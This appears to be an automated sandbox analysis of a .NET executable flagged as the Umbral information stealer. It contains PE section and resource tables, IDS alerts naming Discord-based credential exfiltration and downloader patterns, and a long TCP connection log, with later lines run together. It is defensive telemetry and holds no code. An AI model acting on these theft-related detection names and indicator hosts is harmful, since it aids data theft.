                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                       Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                       .text | 0x2000 | 0xdec74 | 0xdee00 | 15dab2e0d80f3b232d8463b9b14f3cdc | False | 0.9958680945036456 | data | 7.996941736899731 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                       .rsrc | 0xe2000 | 0x1634 | 0x1800 | 4e012386674edc404cbe5adca219bee2 | False | 0.4441731770833333 | data | 5.536812127006422 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       .reloc | 0xe4000 | 0xc | 0x200 | c73d664973261def0dbb4c24defbbff3 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                       Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                       RT_ICON | 0xe2130 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | - | - | 0.4817073170731707
                                       RT_GROUP_ICON | 0xe31d8 | 0x14 | data | - | - | 1.1
                                       RT_VERSION | 0xe31ec | 0x25c | data | - | - | 0.4652317880794702
                                       RT_MANIFEST | 0xe3448 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5469387755102041
                                       DLL | Import
                                       mscoree.dll | _CorExeMain
                                       Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                       2024-09-07T01:47:46.654886+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49731 | 208.95.112.1 | 80 | TCP
                                       2024-09-07T01:47:50.445728+0200 | 2045593 | ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) | 1 | 192.168.2.5 | 49732 | 162.159.135.232 | 443 | TCP
                                       2024-09-07T01:48:02.808800+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49753 | 208.95.112.1 | 80 | TCP
                                       2024-09-07T01:48:05.148671+0200 | 2045593 | ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) | 1 | 192.168.2.5 | 49755 | 162.159.136.232 | 443 | TCP
                                       2024-09-07T01:48:16.913682+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49769 | 208.95.112.1 | 80 | TCP
                                       2024-09-07T01:48:19.630044+0200 | 2045593 | ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) | 1 | 192.168.2.5 | 49771 | 162.159.135.232 | 443 | TCP
                                       2024-09-07T01:48:29.257120+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49783 | 208.95.112.1 | 80 | TCP
                                       2024-09-07T01:48:31.749098+0200 | 2045593 | ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) | 1 | 192.168.2.5 | 49786 | 162.159.135.232 | 443 | TCP
                                       2024-09-07T01:48:41.243964+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49798 | 208.95.112.1 | 80 | TCP
                                       2024-09-07T01:48:44.042997+0200 | 2045593 | ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) | 1 | 192.168.2.5 | 49801 | 162.159.136.232 | 443 | TCP
                                       2024-09-07T01:48:54.528533+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49812 | 208.95.112.1 | 80 | TCP
                                       2024-09-07T01:48:57.245974+0200 | 2045593 | ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) | 1 | 192.168.2.5 | 49814 | 162.159.138.232 | 443 | TCP
                                       2024-09-07T01:49:09.463268+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49827 | 208.95.112.1 | 80 | TCP
                                       2024-09-07T01:49:11.730189+0200 | 2045593 | ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) | 1 | 192.168.2.5 | 49828 | 162.159.137.232 | 443 | TCP
                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                       Sep 7, 2024 01:47:01.665518045 CEST | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                       Sep 7, 2024 01:47:01.670315981 CEST | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                       Sep 7, 2024 01:47:01.670401096 CEST | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                       Sep 7, 2024 01:47:01.671267986 CEST | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                       Sep 7, 2024 01:47:01.676065922 CEST | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                       Sep 7, 2024 01:47:02.147002935 CEST | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                                       Sep 7, 2024 01:47:02.188129902 CEST | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                       Sep 7, 2024 01:47:04.522553921 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
                                       Sep 7, 2024 01:47:04.522589922 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
                                       Sep 7, 2024 01:47:04.522664070 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
                                       Sep 7, 2024 01:47:04.564217091 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
                                       Sep 7, 2024 01:47:04.564245939 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
                                       Sep 7, 2024 01:47:05.028460979 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
                                       Sep 7, 2024 01:47:05.028528929 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
                                       Sep 7, 2024 01:47:05.038113117 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
                                       Sep 7, 2024 01:47:05.038130999 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
                                       Sep 7, 2024 01:47:05.038367033 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
                                       Sep 7, 2024 01:47:05.078623056 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
                                       Sep 7, 2024 01:47:05.105470896 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
                                       Sep 7, 2024 01:47:05.148509026 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
                                       Sep 7, 2024 01:47:05.350684881 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
                                       Sep 7, 2024 01:47:05.350764036 CEST | 443 | 49705 | 188.114.97.3 | 192.168.2.5
                                       Sep 7, 2024 01:47:05.353059053 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
                                       Sep 7, 2024 01:47:05.353867054 CEST | 49705 | 443 | 192.168.2.5 | 188.114.97.3
                                       Sep 7, 2024 01:47:05.365514040 CEST | 49707 | 443 | 192.168.2.5 | 104.21.85.189
                                       Sep 7, 2024 01:47:05.365547895 CEST | 443 | 49707 | 104.21.85.189 | 192.168.2.5
                                       Sep 7, 2024 01:47:05.369087934 CEST | 49707 | 443 | 192.168.2.5 | 104.21.85.189
                                       Sep 7, 2024 01:47:05.369719028 CEST | 49707 | 443 | 192.168.2.5 | 104.21.85.189
                                       Sep 7, 2024 01:47:05.369731903 CEST | 443 | 49707 | 104.21.85.189 | 192.168.2.5
                                       Sep 7, 2024 01:47:06.106219053 CEST | 443 | 49707 | 104.21.85.189 | 192.168.2.5
                                       Sep 7, 2024 01:47:06.108994961 CEST | 49707 | 443 | 192.168.2.5 | 104.21.85.189
                                       Sep 7, 2024 01:47:06.122211933 CEST | 49707 | 443 | 192.168.2.5 | 104.21.85.189
                                       Sep 7, 2024 01:47:06.122227907 CEST | 443 | 49707 | 104.21.85.189 | 192.168.2.5
                                       Sep 7, 2024 01:47:06.122500896 CEST | 443 | 49707 | 104.21.85.189 | 192.168.2.5
                                       Sep 7, 2024 01:47:06.137001038 CEST | 49707 | 443 | 192.168.2.5 | 104.21.85.189
                                       Sep 7, 2024 01:47:06.180510044 CEST | 443 | 49707 | 104.21.85.189 | 192.168.2.5
                                       Sep 7, 2024 01:47:06.261421919 CEST | 443 | 49707 | 104.21.85.189 | 192.168.2.5
                                       Sep 7, 2024 01:47:06.261476040 CEST | 443 | 49707 | 104.21.85.189 | 192.168.2.5
                                       Sep 7, 2024 01:47:06.261503935 CEST | 443 | 49707 | 104.21.85.189 | 192.168.2.5
                                      Sep 7, 2024 01:47:06.261590004 CEST44349707104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:06.261614084 CEST49707443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:06.265645027 CEST49707443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:06.277971029 CEST49707443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:08.698299885 CEST4970880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:08.838443995 CEST8049708208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:08.838840008 CEST4970880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:08.838840008 CEST4970880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:08.843616009 CEST8049708208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:09.306864977 CEST8049708208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:09.360850096 CEST4970880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:09.628407955 CEST8049708208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:09.628473997 CEST4970880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:21.225466013 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.225517035 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.225593090 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.227606058 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.227618933 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.697335958 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.697427034 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.698911905 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.698935032 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.699163914 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.713669062 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.760504961 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.842067003 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.842164993 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.842262983 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.843019962 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.844043016 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:21.844080925 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:21.844208956 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:21.845304966 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:21.845319033 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.393829107 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.393898010 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:22.395344019 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:22.395354986 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.395584106 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.396456003 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:22.440500975 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.790112972 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.790158033 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.790188074 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.790237904 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:22.790251017 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.790262938 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.790302992 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:22.792145967 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:24.070728064 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.070784092 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.070924044 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.073132992 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.073147058 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.535701990 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.535768986 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.537739038 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.537755013 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.538063049 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.552233934 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.596496105 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.656306028 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.656372070 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.656447887 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.657272100 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.658461094 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:24.658494949 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:24.658719063 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:24.658932924 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:24.658951044 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.257791996 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.257863998 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:25.259352922 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:25.259361982 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.259628057 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.260581970 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:25.308510065 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.414566040 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.414613008 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.414639950 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.414685965 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:25.414701939 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.414720058 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.414748907 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:25.414777040 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:25.416285992 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:28.572516918 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:28.572554111 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:28.572621107 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:28.574727058 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:28.574738979 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.040443897 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.040508986 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:29.044903040 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:29.044909954 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.045165062 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.066667080 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:29.108511925 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.187474966 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.187532902 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.187664986 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:29.188571930 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:29.191992044 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.192039967 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.192116022 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.192344904 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.192359924 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.656769991 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.656836987 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.658653975 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.658663988 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.658900976 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.659924984 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.700501919 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.804719925 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.804763079 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.804799080 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.804838896 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.804850101 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.804883003 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.804927111 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.806777954 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:31.289115906 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.289165020 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.289233923 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.291075945 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.291090965 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.757816076 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.757890940 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.760207891 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.760219097 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.760447979 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.774905920 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.816505909 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.891201019 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.891455889 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.891505003 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.891876936 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.893212080 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:31.893254995 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:31.893317938 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:31.893572092 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:31.893589973 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.374461889 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.374664068 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:32.377048016 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:32.377057076 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.377301931 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.385031939 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:32.428508043 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.538841963 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.538885117 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.538913965 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.538986921 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.539019108 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:32.541037083 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:32.541174889 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:36.078308105 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:36.078356981 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:36.078423977 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:36.080851078 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:36.080864906 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.574234962 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.574335098 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:37.576477051 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:37.576493025 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.576745033 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.588665962 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:37.636503935 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.940773964 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.940846920 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.941050053 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:37.948457003 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:38.010798931 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.010852098 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.011046886 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.011250973 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.011274099 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.627105951 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.627175093 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.628473997 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.628492117 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.628746033 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.629841089 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.672507048 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.775988102 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.776034117 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.776066065 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.776076078 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.776093960 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.776128054 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.776135921 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.776149035 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.776181936 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.778516054 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:40.117044926 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.117117882 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.117444992 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.121042967 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.121064901 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.719491959 CEST8049704208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:40.719564915 CEST4970480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:40.719893932 CEST8049704208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:40.719940901 CEST4970480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:40.722439051 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.722503901 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.723833084 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.723839998 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.724073887 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.739521980 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.784501076 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.884877920 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.884947062 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.884999037 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.885936975 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.890999079 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:40.891036987 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:40.891119003 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:40.891606092 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:40.891621113 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.053236008 CEST4972819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:41.058056116 CEST1949649728147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:47:41.058119059 CEST4972819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:41.219234943 CEST4972819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:41.225121021 CEST1949649728147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:47:41.354162931 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.354257107 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:41.373048067 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:41.373076916 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.373325109 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.381043911 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:41.428510904 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.529901981 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.529956102 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.529983997 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.530081034 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:41.530098915 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.530414104 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:41.530536890 CEST44349727104.21.85.189192.168.2.5
